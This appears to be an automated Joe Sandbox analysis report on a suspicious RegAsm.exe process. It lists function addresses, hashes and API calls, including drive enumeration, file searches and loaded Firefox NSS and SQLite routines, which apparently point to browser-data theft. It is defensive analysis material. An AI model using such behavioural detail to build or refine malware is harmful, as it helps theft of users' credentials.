Opcode ID: f9d78ce87802fc23f58829be8761b93256826cdff98c98fe9bd6a87f34df7215
Instruction ID: b7f2429d00cbd24f03b085da7ffc6c1b13d1efed039a81a5c695adca19b4959d
Opcode Fuzzy Hash: f9d78ce87802fc23f58829be8761b93256826cdff98c98fe9bd6a87f34df7215
Instruction Fuzzy Hash: AB819571C04248EADB05EBE5D946ADEBBB8AF14308F50496FF405732C1EB785718CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00406220 Relevance: 1.6, APIs: 1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bbfcb08ace769c478a6e97ea2a41c8368e086d7de68ff1f9fc81c69203c94191
Instruction ID: 88b31800e1bd1f550d8eb9f155011e01342655bf2c649e0f580616cf577fde9a
Opcode Fuzzy Hash: bbfcb08ace769c478a6e97ea2a41c8368e086d7de68ff1f9fc81c69203c94191
Instruction Fuzzy Hash: 29413A7190021ADFCF14AF94D9809AEBBB2BB04314F16847FE916B7391D7389E50CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040AA53 Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040AA58

Part of subcall function 004010A5: _EH_prolog.MSVCRT ref: 004010AA

Part of subcall function 0040E5B7: lstrcpy.KERNEL32(00000000,GPA), ref: 0040E5DD

Part of subcall function 0040A132: _EH_prolog.MSVCRT ref: 0040A137
Part of subcall function 0040A132: FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,?,?,00423AF3,00000000,?,00000000), ref: 0040A1B6

Memory Dump Source

Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$FileFindFirstlstrcpy
String ID:
API String ID: 1592259726-0
Opcode ID: 4d8b1b45906d495d6f5c137523b9309f349a13dd406d41b2bbe5cb9d08fb554d
Instruction ID: 0d7853f7fbfcb65061722039a5b48e63e6cba7d9ac331d543458f57b634d35a6
Opcode Fuzzy Hash: 4d8b1b45906d495d6f5c137523b9309f349a13dd406d41b2bbe5cb9d08fb554d
Instruction Fuzzy Hash: E1216F71900248EBCF11EFA9C9067DDBBB4AF59308F00456EE885632C1D7395718CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00401DD6 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00401DDB

Part of subcall function 004010A5: _EH_prolog.MSVCRT ref: 004010AA

Part of subcall function 0040E5B7: lstrcpy.KERNEL32(00000000,GPA), ref: 0040E5DD

Part of subcall function 00401140: _EH_prolog.MSVCRT ref: 00401145
Part of subcall function 00401140: FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00420334,?,?,?,00420330,?,?,00000000,?,00000000), ref: 0040138A

Memory Dump Source

Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$FileFindFirstlstrcpy
String ID:
API String ID: 1592259726-0
Opcode ID: 9dd089d64e27994004124cef0cc5ded8b6c6f2f6c2a1f415b82bb110b99e50fc
Instruction ID: 52374e6235f4fdb2264a43de975b64ed59cf11a7eb4f4aa554f6eda265910e96
Opcode Fuzzy Hash: 9dd089d64e27994004124cef0cc5ded8b6c6f2f6c2a1f415b82bb110b99e50fc
Instruction Fuzzy Hash: 9F21D171C00248EBCB01EFAAC94769CBBB8AF45318F00452FE85873281EB3857548BD6

Uniqueness

Uniqueness Score: -1.00%

Function 0041437B Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00414380

Part of subcall function 00411745: _EH_prolog.MSVCRT ref: 0041174A

Part of subcall function 004010A5: _EH_prolog.MSVCRT ref: 004010AA

Part of subcall function 0041418A: _EH_prolog.MSVCRT ref: 0041418F
Part of subcall function 0041418A: GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004141F1
Part of subcall function 0041418A: memset.MSVCRT ref: 00414210
Part of subcall function 0041418A: GetDriveTypeA.KERNEL32(?), ref: 00414219
Part of subcall function 0041418A: lstrcpy.KERNEL32(?,00000000), ref: 00414239
Part of subcall function 0041418A: lstrcpy.KERNEL32(?,00000000), ref: 0041427A
Part of subcall function 0041418A: lstrlen.KERNEL32(?), ref: 004142DC

Memory Dump Source

Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$Drivelstrcpy$LogicalStringsTypelstrlenmemset
String ID:
API String ID: 373919974-0
Opcode ID: 803ec6ae56a9befae404518276d950053f4e6715e29306928e3e0c96fe7178f0
Instruction ID: 04eda5af69a5ab9f34a92bc77b793a2690fc2b4fbca8d197a0248fc083632076
Opcode Fuzzy Hash: 803ec6ae56a9befae404518276d950053f4e6715e29306928e3e0c96fe7178f0
Instruction Fuzzy Hash: 60018071D00258EBDF10EFA8C9467EEBBB4FB80764F10411AE86163682D7385A8587D6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6CBD6C80 Relevance: 95.2, APIs: 50, Strings: 4, Instructions: 727encryptionfileCOMMON

Download Yara Rule

APIs

CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6CBD6CCC
CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6CBD6D11
moz_xmalloc.MOZGLUE(0000000C), ref: 6CBD6D26

Part of subcall function 6CBDCA10: malloc.MOZGLUE(?), ref: 6CBDCA26

memset.VCRUNTIME140(00000000,00000000,0000000C), ref: 6CBD6D35
CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6CBD6D53
CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,00000000,00000000), ref: 6CBD6D73
free.MOZGLUE(00000000), ref: 6CBD6D80
CertGetNameStringW.CRYPT32 ref: 6CBD6DC0
moz_xmalloc.MOZGLUE(00000000), ref: 6CBD6DDC
memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6CBD6DEB
CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6CBD6DFF
CertFreeCertificateContext.CRYPT32(00000000), ref: 6CBD6E10
CryptMsgClose.CRYPT32(00000000), ref: 6CBD6E27
CertCloseStore.CRYPT32(00000000,00000000), ref: 6CBD6E34
CreateFileW.KERNEL32 ref: 6CBD6EF9
moz_xmalloc.MOZGLUE(00000000), ref: 6CBD6F7D
memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6CBD6F8C
memset.VCRUNTIME140(00000002,00000000,00000208), ref: 6CBD709D
CryptQueryObject.CRYPT32(00000001,00000002,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6CBD7103
free.MOZGLUE(00000000), ref: 6CBD7153
CloseHandle.KERNEL32(?), ref: 6CBD7176
__Init_thread_footer.LIBCMT ref: 6CBD7209
__Init_thread_footer.LIBCMT ref: 6CBD723A
__Init_thread_footer.LIBCMT ref: 6CBD726B
__Init_thread_footer.LIBCMT ref: 6CBD729C
__Init_thread_footer.LIBCMT ref: 6CBD72DC
__Init_thread_footer.LIBCMT ref: 6CBD730D
memset.VCRUNTIME140(?,00000000,00000110), ref: 6CBD73C2
VerSetConditionMask.NTDLL ref: 6CBD73F3
VerSetConditionMask.NTDLL ref: 6CBD73FF
VerSetConditionMask.NTDLL ref: 6CBD7406
VerSetConditionMask.NTDLL ref: 6CBD740D
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6CBD741A
moz_xmalloc.MOZGLUE(?), ref: 6CBD755A
memset.VCRUNTIME140(00000000,00000000,?), ref: 6CBD7568
CryptBinaryToStringW.CRYPT32(00000000,00000000,4000000C,00000000,?), ref: 6CBD7585
_wcsupr_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6CBD7598
free.MOZGLUE(00000000), ref: 6CBD75AC

Part of subcall function 6CBFAB89: EnterCriticalSection.KERNEL32(6CC4E370,?,?,?,6CBC34DE,6CC4F6CC,?,?,?,?,?,?,?,6CBC3284), ref: 6CBFAB94
Part of subcall function 6CBFAB89: LeaveCriticalSection.KERNEL32(6CC4E370,?,6CBC34DE,6CC4F6CC,?,?,?,?,?,?,?,6CBC3284,?,?,6CBE56F6), ref: 6CBFABD1

Strings

SHA256, xrefs: 6CBD6EC0
CryptCATAdminReleaseCatalogContext, xrefs: 6CBD72C8
(, xrefs: 6CBD768A
wintrust.dll, xrefs: 6CBD72CD

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: CryptInit_thread_footermemset$Cert$ConditionMaskmoz_xmalloc$CloseStringfree$CertificateCriticalNameObjectParamQuerySectionStore$BinaryContextCreateEnterFileFindFreeHandleInfoLeaveVerifyVersion_wcsupr_smalloc
String ID: ($CryptCATAdminReleaseCatalogContext$SHA256$wintrust.dll
API String ID: 3256780453-3980470659
Opcode ID: 6cc363253daaa0013e15c7c247b9557b1db61e1ff61ee23c9aada72f6398c0f3
Instruction ID: 578ab825416467f999ee2fc3e0610d576e62ad4057b3fb1204d73941564cec65
Opcode Fuzzy Hash: 6cc363253daaa0013e15c7c247b9557b1db61e1ff61ee23c9aada72f6398c0f3
Instruction Fuzzy Hash: A852D671A002559FEB21DF24CC84BEA77B8EF46708F118599E909AB640EB70BF85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 6CBD64C0 Relevance: 52.9, APIs: 24, Strings: 6, Instructions: 406memoryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(detoured.dll), ref: 6CBD64DF
GetModuleHandleW.KERNEL32(_etoured.dll), ref: 6CBD64F2
GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 6CBD6505
GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 6CBD6518
GetModuleHandleW.KERNEL32(user32.dll), ref: 6CBD652B
memcpy.VCRUNTIME140(?,?,?), ref: 6CBD671C
GetCurrentProcess.KERNEL32 ref: 6CBD6724
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6CBD672F
GetCurrentProcess.KERNEL32 ref: 6CBD6759
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6CBD6764
VirtualProtect.KERNEL32(?,00000000,?,?), ref: 6CBD6A80
GetSystemInfo.KERNEL32(?), ref: 6CBD6ABE
__Init_thread_footer.LIBCMT ref: 6CBD6AD3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CBD6AE8
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CBD6AF7

Strings

user32.dll, xrefs: 6CBD6526
nvd3d9wrap.dll, xrefs: 6CBD6500
nvdxgiwrap.dll, xrefs: 6CBD6513
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows, xrefs: 6CBD6798
detoured.dll, xrefs: 6CBD64DA
_etoured.dll, xrefs: 6CBD64ED

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll
API String ID: 487479824-2878602165
Opcode ID: 9198cbcbbdd017cb263690946e4eb104ef79777de545eff883b2b6a1fa0e2422
Instruction ID: d871e22e8071daba17c89151bf8794299dafed1c8a422393d93ce88ade40439e
Opcode Fuzzy Hash: 9198cbcbbdd017cb263690946e4eb104ef79777de545eff883b2b6a1fa0e2422
Instruction Fuzzy Hash: 70F1F3709016698FDB20DF24CC88B9AB7B5EF46318F1586D9D809E7681E731BE84CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6CDAEFF0 Relevance: 21.4, APIs: 14, Instructions: 362memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6CDAC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6CDADAE2,?), ref: 6CDAC6C2

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CDAF0AE
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CDAF0C8
PK11_FindKeyByAnyCert.NSS3(?,?), ref: 6CDAF101
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CDAF11D
SEC_ASN1EncodeItem_Util.NSS3(00000000,?,?,6CE7218C), ref: 6CDAF183
SEC_GetSignatureAlgorithmOidTag.NSS3(?,00000000), ref: 6CDAF19A
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CDAF1CB
SECKEY_DestroyPrivateKey.NSS3(?), ref: 6CDAF1EF
SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6CDAF210

Part of subcall function 6CD552D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?,00000000,?,6CDAF1E9,?,00000000,?,?), ref: 6CD552F5
Part of subcall function 6CD552D0: SEC_GetSignatureAlgorithmOidTag.NSS3(00000000,00000000), ref: 6CD5530F
Part of subcall function 6CD552D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?), ref: 6CD55326
Part of subcall function 6CD552D0: PR_SetError.NSS3(FFFFE0B5,00000000,?,?,00000000,?,6CDAF1E9,?,00000000,?,?), ref: 6CD55340

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CDAF227

Part of subcall function 6CD9FAB0: free.MOZGLUE(?,-00000001,?,?,6CD3F673,00000000,00000000), ref: 6CD9FAC7

SECOID_SetAlgorithmID_Util.NSS3(?,?,?,00000000), ref: 6CDAF23E

Part of subcall function 6CD9BE60: SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6CD4E708,00000000,00000000,00000004,00000000), ref: 6CD9BE6A
Part of subcall function 6CD9BE60: SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6CD504DC,?), ref: 6CD9BE7E
Part of subcall function 6CD9BE60: SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6CD9BEC2

PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6CDAF2BB
PR_SetError.NSS3(FFFFE006,00000000), ref: 6CDAF3A8

Part of subcall function 6CDEC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CDEC2BF

SECKEY_DestroyPrivateKey.NSS3(?), ref: 6CDAF3B3

Part of subcall function 6CD52D20: PK11_DestroyObject.NSS3(?,?), ref: 6CD52D3C
Part of subcall function 6CD52D20: PORT_FreeArena_Util.NSS3(?,00000001), ref: 6CD52D5F

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: Util$Algorithm$Item_$Tag_$CopyDestroyFind$ErrorK11_PolicyPrivateSignatureZfree$Alloc_ArenaArena_CertEncodeFreeObjectValuefree
String ID:
API String ID: 1559028977-0
Opcode ID: 2f00e6e11f5198c75ad689308144005c473e549c12789e091405f300aedd961d
Instruction ID: 5bbd2696daf5819d95e34e5978334563b4316dedafb6fb265be4ccb30eca700d
Opcode Fuzzy Hash: 2f00e6e11f5198c75ad689308144005c473e549c12789e091405f300aedd961d
Instruction Fuzzy Hash: F2D16DB6E01205DFEB14CFE9D880A9EB7B5EF48308F158169D915E7721E731E806CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6CC07E10 Relevance: 17.9, APIs: 6, Strings: 4, Instructions: 403COMMON

Download Yara Rule

Strings

(pre-xul), xrefs: 6CC07E88
name, xrefs: 6CC07ECF, 6CC08335
schema, xrefs: 6CC081E3, 6CC08311
data, xrefs: 6CC08280, 6CC083E1

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: memcpystrlen
String ID: (pre-xul)$data$name$schema
API String ID: 3412268980-999448898
Opcode ID: 740ea0c8ab560038d3490163e20d85127608c42b385a74d3840d67132051244a
Instruction ID: a98d56f1e42a2daedd96d28fc2ac02b467d694899dfaed2eb036d77fb9a8d1ee
Opcode Fuzzy Hash: 740ea0c8ab560038d3490163e20d85127608c42b385a74d3840d67132051244a
Instruction Fuzzy Hash: C7E180B1B043808BC710CF68984065FF7E9BF89354F15892DE899D7780EB71ED098B92

Uniqueness

Uniqueness Score: -1.00%

Function 6CBED4D0 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 251COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6CC4E784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6CBFD1C5), ref: 6CBED4F2
LeaveCriticalSection.KERNEL32(6CC4E784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6CBFD1C5), ref: 6CBED50B

Part of subcall function 6CBCCFE0: EnterCriticalSection.KERNEL32(6CC4E784), ref: 6CBCCFF6
Part of subcall function 6CBCCFE0: LeaveCriticalSection.KERNEL32(6CC4E784), ref: 6CBCD026

InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6CBFD1C5), ref: 6CBED52E
EnterCriticalSection.KERNEL32(6CC4E7DC), ref: 6CBED690
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6CBED6A6
LeaveCriticalSection.KERNEL32(6CC4E7DC), ref: 6CBED712
LeaveCriticalSection.KERNEL32(6CC4E784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6CBFD1C5), ref: 6CBED751
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6CBED7EA

Strings

: (malloc) Error initializing arena, xrefs: 6CBED82C
<jemalloc>, xrefs: 6CBED827

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$K@1@Maybe@_RandomUint64@mozilla@@$CountInitializeSpin
String ID: : (malloc) Error initializing arena$<jemalloc>
API String ID: 2690322072-3894294050
Opcode ID: 2ed11b380435845795a2d1d517a54e175cad8774d2d31d189ae6925fc8996142
Instruction ID: 7f1de1c6be2f668e60a0a1fd1d5837411089003e9cc6a9c8b1bb0881d5c94e1e
Opcode Fuzzy Hash: 2ed11b380435845795a2d1d517a54e175cad8774d2d31d189ae6925fc8996142
Instruction Fuzzy Hash: 2E91B271A047818FD714CF39D09072AB7F1EBD9758F15C92ED55A87A81E7B0E844CB82

Uniqueness

Uniqueness Score: -1.00%

Function 6CCDAEC0 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,00000002,?,6CDFCF46,?,6CCCCDBD,?,6CDFBF31,?,?,?,?,?,?,?), ref: 6CCDB039
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6CDFCF46,?,6CCCCDBD,?,6CDFBF31), ref: 6CCDB090
sqlite3_free.NSS3(?,?,?,?,?,?,6CDFCF46,?,6CCCCDBD,?,6CDFBF31), ref: 6CCDB0A2
CloseHandle.KERNEL32(?,?,6CDFCF46,?,6CCCCDBD,?,6CDFBF31,?,?,?,?,?,?,?,?,?), ref: 6CCDB100
sqlite3_free.NSS3(?,?,00000002,?,6CDFCF46,?,6CCCCDBD,?,6CDFBF31,?,?,?,?,?,?,?), ref: 6CCDB115
sqlite3_free.NSS3(?,?,?,?,?,?,6CDFCF46,?,6CCCCDBD,?,6CDFBF31), ref: 6CCDB12D

Part of subcall function 6CCC9EE0: EnterCriticalSection.KERNEL32(?,?,?,?,6CCDC6FD,?,?,?,?,6CD2F965,00000000), ref: 6CCC9F0E
Part of subcall function 6CCC9EE0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6CD2F965,00000000), ref: 6CCC9F5D

Strings

`l, xrefs: 6CCDB0DF

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: CriticalSection$sqlite3_free$EnterLeave$CloseHandle
String ID: `l
API String ID: 3155957115-379310572
Opcode ID: d6f56b0fb3d47d547d64e4424b806564c3538e0d94f54c3d9a574ca25074dde7
Instruction ID: 3e316555a51eda598daf1abaccc3bf70bec0277ced3327b839a3dd533aa72237
Opcode Fuzzy Hash: d6f56b0fb3d47d547d64e4424b806564c3538e0d94f54c3d9a574ca25074dde7
Instruction Fuzzy Hash: DE91CDB1A042068FDB04CF65D884A6BB7B2FF85308F16466EE51697B50FB30F855CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6CD70EC0 Relevance: 16.7, APIs: 11, Instructions: 213memoryCOMMON

Download Yara Rule

APIs

PK11_PubDeriveWithKDF.NSS3 ref: 6CD70F8D
SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6CD70FB3
PR_SetError.NSS3(FFFFE00E,00000000), ref: 6CD71006
PK11_FreeSymKey.NSS3(?), ref: 6CD7101C
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CD71033
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CD7103F
PK11_FreeSymKey.NSS3(00000000), ref: 6CD71048
memcpy.VCRUNTIME140(?,?,?), ref: 6CD7108E
SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6CD710BB
memcpy.VCRUNTIME140(?,00000006,?), ref: 6CD710D6
memcpy.VCRUNTIME140(?,?,?), ref: 6CD7112E

Part of subcall function 6CD71570: htonl.WSOCK32(?,?,?,?,?,?,?,?,6CD708C4,?,?), ref: 6CD715B8
Part of subcall function 6CD71570: htonl.WSOCK32(?,?,?,?,?,?,?,?,?,6CD708C4,?,?), ref: 6CD715C1
Part of subcall function 6CD71570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CD7162E
Part of subcall function 6CD71570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CD71637

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
